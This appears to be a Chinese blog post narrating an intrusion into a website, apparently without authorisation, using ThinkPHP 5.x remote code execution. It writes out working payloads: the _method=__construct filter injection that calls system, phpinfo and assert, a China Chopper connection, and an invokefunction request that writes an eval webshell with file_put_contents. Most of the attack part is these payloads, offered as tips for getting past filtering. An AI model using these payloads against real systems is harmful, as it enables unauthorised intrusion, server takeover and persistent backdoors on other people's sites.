1.拿到站首先平复一下心情

看了一下robots.txt结构像dedecms,网站还存在CDN,日了狗看到这里其实都想放弃来着,懒癌晚期,然后接着使用云悉平台走了一波,看了一下得到真实IP,看来只给www做了cdn其他子域名并未做,

然后看着子域名这么多,然后接着要做的就是挨个点一遍,寻找薄弱点,大部分都打不开,其中还有几个打开直接跳转到主站,忽略,找到个看着就像有漏洞的网站,随手测试了一下单引号,好的没报错,果然不出我所料,尴尬。

好了,放在一边接着看,看到一个很熟悉的标题,系统发生报错,这不就是tp的报错信息么。

没错还是这个熟悉的配方熟悉的页面,根据我30多年的渗透测试经验来看,这个站就要被我拿下了,

哼,不过如此。

掏出不知道从来搜索出来的paylaod一顿怼,没错一如既往的被打脸,

http://127.0.0.1/index.php?s=captcha首先测试这个方法是否存在

post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

根据回显出来的信息感觉执行的函数被禁用掉了

http://127.0.0.1/index.php?m=1
POST：_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=

成功执行phpinfo,呵,不过如此。其实内心慌得一批。

http://127.0.0.1/index.php?m=assert($POST[1])
POST：method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=
password:1

菜刀构造数据包

< O >123< /O> (去掉空格)

##小姿势：

thinkphp 5.0.21被拦截,可以采用写文件方式。

GET请求t

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php eval^($_POST[cmd])?>

最新文章

1. ajax总结：
2. Python XML解析（转载）
3. 安卓 NEXUS6 修改分辨率，density
4. 运行maven报错:经过检查是因为maven不兼容jdk1.6,重新安装1.7解决
5. IMP 导入数据报错 OCI-21500 OCI-22275
6. Java的λ表达（lambda）
7. Hopfield神经网络实现污染字体的识别
8. 详解 anjularjs的ui-route（多视图、视图嵌套、视图传参）
9. 部署 Helm - 每天5分钟玩转 Docker 容器技术（162）
10. Opencv（C++）实现邻近插值算法
11. 接口自动化：HttpClient + TestNG + Java(五) - 接口测试数据驱动
12. Hadoop记录-日常运维操作
13. ifconf家族命令
14. Ubuntu16.04安装后开发环境配置和常用软件安装
15. MXNET：多层感知机
16. JDK 8 中Lambda表达式的使用
17. Jenkins邮箱设置
18. DataTable初次使用笔记
19. 更新RDL文件中的数据集(DataSets)
20. Windows和Ubuntu双系统时间相差8个小时的问题

热门文章

1. 10. Python面向对象
2. ICPC Asia Nanning 2017 L. Twice Equation (规律 高精度运算)
3. PHPStorm IDE 快捷键(MAC版)
4. Java DOM解析器
5. 微信小程序之评分页面
6. React简单入门
7. python 2 学习历程（一）
8. 第一个gulp 项目
9. 29. StringBuilder
10. 使用JS实现快速排序